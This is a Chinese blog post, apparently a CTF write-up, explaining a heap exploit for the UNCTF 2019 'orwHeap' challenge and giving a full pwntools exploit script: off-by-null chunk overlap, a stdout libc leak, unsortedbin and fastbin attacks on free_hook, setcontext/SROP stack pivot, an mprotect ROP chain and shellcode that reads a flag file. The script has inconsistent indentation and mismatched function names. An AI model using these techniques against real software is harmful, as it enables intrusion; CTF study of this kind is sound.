setcontext利用

2020-10-06

字数统计: 1.2k字 | 阅读时长≈ 6分

学习ing。

UNCTF 2019 pwn orwHeap

程序分析

程序漏洞很明显，堆溢出能溢出一个字节和末尾的 ‘\x00’。

利用分析

首先构造 chunk_overlap

能溢出一个字节和在末尾一个 x00，可以很常规的构造 chunk overlap。申请 chunk1 size1为0x98，chunk2 size2 为 0x68，chunk3 size3为 0xf8，释放 chunk0，利用 chunk2 的 off-by-null 修改 chunk3 的 prev_inuse 位并伪造 prev_size 为 szie1+size2，随后先释放 chunk2 到 fastbin中，再释放 chunk3 合并。

随后再申请一个 size1 的大小，并修改 fake_chunk2 的 size 大于 size2，避免直接申请 size2 会从fastbin 中将原 chunk2取出，改大了 size，需要在前面申请 chunk3 时伪造一个堆头 size。此时 fake_chunk2 的 fd 位残留了 main_arena+88 地址，修改其后两位为 _IO_stdout 结构的地址。最后连续申请两块 size2 的chunk，即可把 _IO_stdout 申请出来。然后修改 _IO_stdout 结构体，泄露地址。

unsortedbin 往 free_hook-0x20处写libc 地址

这道题开启了沙箱，不能向以往直接 malloc_hook 或 free_hook 改为 gadget 来 getshell。我们需要利用 stecontext 函数来迁移栈，为了修改 free_hook 的值，我们记得使用 fastbin attack 在 free_hooK 前面伪造堆块头，但是可以发现正常流程中 free_hook 前面没有常见的 x7f，所以我们得自己先往 fre_hook-0x10处使用 unsortedbin attack 来写入一个 libc 地址。

由于只能同时申请 5 个 chunk，所以我们先得把之前不用得 chunk 清空，然后利用上一步类似的 chunk_overlap 来构造 unsortedbin attack。

fastbin attack 修改 free_hook 为setcontext来 getshell

经过 unsortedbin attack 往 free_hook 写了 libc 地址后，即可使用 fastbin attack 申请free_hooK处的伪造堆块，随后修改 free_hook 的值为 setcontext+53 的地址，并在之前的堆块处部署 ROP 链。随后 free 该块即可 getshell。

EXP

from pwn import *
context.update(arch='amd64', os='linux', log_level='debug')
#context.terminal=(['tmux', 'splitw', '-h'])

debug = 1
if debug == 1:
    p = process('./pwn')
    elf = ELF('./pwn')
    libc = ELF('./libc.so.6')
else:
    libc = ELF('./libc-2.23.so')

gadgets = [0x45226,0x4527a,0xf0364,0xf1207]
def Add(size, content, flag = 0):
    p.recvuntil('Your Choice: ')
    p.sendline(str(1))
    p.recvuntil('Please input size: ')
    p.sendline(str(size))
    p.recvuntil('Please input content: ')
    if flag == 0:
        p.sendline(content)
    else:
        p.send(content)
def Edit(idx, content, flag = 0):
    p.recvuntil('Your Choice: ')
    p.sendline(str(3))
    p.recvuntil('Please input idx: ')
    p.sendline(str(idx))
    p.recvuntil('Please input content: ')
    if flag == 0:
        p.sendline(content)
    else:
        p.send(content)

def Delete(idx):
    p.recvuntil('Your Choice: ')
    p.sendline(str(2))
    p.recvuntil('Please input idx: ')
    p.sendline(str(idx))

def pwn():
    i = 1
    while True:
        try:
            print i
            i += 1
            Add(0x90, 'a')  #0
            Add(0x68, 'b')  #1
            payload = p64(0) + p64(0x71)
            Add(0xf8, payload)  #2
            Add(0x77, 'd')  #3
            #gdb.attach(p)

            Delete(1)
            Delete(0)
            payload = p64(0) + p64(0x61)+'a'*0x50 + p64(0x70+0xa0)
            Add(0x68, payload)  #0, chunk1
            #Delete(1)
            Delete(0)
    
            #gdb.attach(p)
            Delete(2)
            Add(0x98, 'c') #0, chunk0
            Add(0x78, 'b')  #1, chunk1
            #Delete()
            Edit(1, '\xdd\x25',flag=1)
            Delete(0)
            payload = 'a'*0x98 + b'\x71'
            Add(0x98, payload, flag = 1)    #0, chunk0
            print 'get stdout:'
            #gdb.attach(p)
            payload = 'b'*0x68 + b'\x01'
            Add(0x68, payload)  #2, chunk1
            payload = 'a'*0x33 + p64(0xfbad1800) + p64(0)*3 + '\x00'
            Add(0x68, payload)  #4, stdout
            libc_addr = u64(p.recvuntil('\x7f')[-6:].ljust(8, '\x00'))
            libc_base = libc_addr - 0x3c4f18
            print 'libc_addr:',hex(libc_addr)
            print 'libc_base:',hex(libc_base)
            #malloc_hook = libc_base + 0x3c4b10
            free_hook = libc_base + 0x3c67a8
            #gadget = gadgets[0] + libc_base
            #print 'malloc_hook:',hex(malloc_hook)
            #print 'gadget:',hex(gadget)
            print 'free_hook:',hex(free_hook)
        except:
            #p.close()
            libc = ELF('/lib/x86_64-linux-gnu/libc.so.6')
            p = process('./pwn')
        else:
            break

    # Add(0x90, 'a')  #0
    # Add(0x68, 'b')  #1
    # payload = p64(0) + p64(0x71)
    # Add(0xf8, payload)  #2
    # Add(0x77, 'd')  #3
    # #gdb.attach(p)

    # Delete(1)
    # Delete(0)
    # payload = p64(0) + p64(0x61)+'a'*0x50 + p64(0x70+0xa0)
    # Add(0x68, payload)  #0, chunk1
    # #Delete(1)
    # Delete(0)

    # #gdb.attach(p)
    # Delete(2)
    # Add(0x98, 'c') #0, chunk0
    # Add(0x78, 'b')  #1, chunk1
    # #Delete()
    # Edit(1, '\xdd\x25',flag=1)
    # Delete(0)
    # payload = 'a'*0x98 + b'\x71'
    # Add(0x98, payload, flag = 1)    #0, chunk0
    # print 'get stdout:'
    # gdb.attach(p)
    # payload = 'b'*0x68 + b'\x01'
    # Add(0x68, payload)  #2, chunk1
    # payload = 'a'*0x33 + p64(0xfbad1800) + p64(0)*3 + '\x00'
    # Add(0x68, payload)  #4, stdout
    # libc_addr = u64(p.recvuntil('\x7f')[-6:].ljust(8, '\x00'))
    # libc_base = libc_addr - 0x3c4f18
    # print 'libc_addr:',hex(libc_addr)
    # print 'libc_base:',hex(libc_base)
    # #malloc_hook = libc_base + 0x3c4b10
    # free_hook = libc_base + 0x3c67a8
    # #gadget = gadgets[0] + libc_base
    # #print 'malloc_hook:',hex(malloc_hook)
    # #print 'gadget:',hex(gadget)
    # print 'free_hook:',hex(free_hook)

    #unsortedbin to free_hook
    gdb.attach(p)
    Delete(0)
    payload = 'a'*0x98 + b'\x81'
    Add(0x98, payload)  #0, chunk0
    Delete(1)
    Add(0xe0, 'a')  #1  , chunk2
    Delete(0)
    payload = 'a'*0x70 + p64(0x80+0xa0) + b'\xf0'
    Add(0x78, payload)  #5, chunk1
    #Delete(0)
    Delete(1)
    gdb.attach(p)
    Add(0x98, 'c')  #0, chunk0
    Edit(2, p64(0)+p64(free_hook-0x20))
    payload = 'a'
    Add(0x68, payload)  #1, chunk1

    #fastbin attack
    Delete(1)
    fake_chunk = free_hook - 0x13
    Edit(6, p64(fake_chunk))
    Delete(0)
    Add(0x68, 'a')  #0, chunk1

    frame = SigreturnFrame()
    frame.rdi = 0
    frame.rsi = (free_hook) & 0xfffffffffffff000 #
    frame.rdx = 0x2000
    frame.rsp = (free_hook) & 0xfffffffffffff000 #栈迁移
    frame.rip = libc_base + 0xbc375 #: syscall; ret; 此rax=0，调用read
    payload = str(frame)

    Add(0x68, 'fff' + p64(libc_base + libc.symbols['setcontext'] + 53))  #1, free_hook

    edit(0, payload[:0x98])
    delete(0) #触发SROP
	pop_rdi_ret = libc_base + 0x21102 
    pop_rsi_ret = libc_base + 0x202e8
    pop_rdx_ret = libc_base + 0x1b92
    pop_rax_ret = libc_base + 0x33544
    jmp_rsp = libc_base + 0x2a71
    payload = p64(pop_rdi_ret) + p64((free_hook) & 0xfffffffffffff000)
    payload += p64(pop_rsi_ret) + p64(0x2000)
    payload += p64(pop_rdx_ret) + p64(7)
    payload += p64(pop_rax_ret) + p64(10)  #mprotect调用号
    payload += p64(libc_base + 0xbc375)
    payload += p64(jmp_rsp)
    shellcode = asm('''
        sub rsp, 0x800
        push 0x67616c66
        mov rdi, rsp
        xor esi, esi
        mov eax, 2
        syscall

        cmp eax, 0
        js failed

        mov edi, eax
        mov rsi, rsp
        mov edx, 0x100
        xor eax, eax
        syscall

        mov edx, eax
        mov rsi, rsp
        mov edi, 1
        mov eax, edi
        syscall

        jmp exit

        failed:
        push 0x6c696166
        mov edi, 1
        mov rsi, rsp
        mov edx, 4
        mov eax, edi
        syscall

        exit:
        xor edi, edi
        mov eax, 231
        syscall
        ''')
	# gdb.attach(p)
	p.send(payload + shellcode)
    p.interactive()

pwn()

本文作者： A1ex
本文链接： http://yoursite.com/2020/10/06/setcontext利用/
版权声明： 本博客所有文章除特别声明外，均采用 MIT 许可协议。转载请注明出处！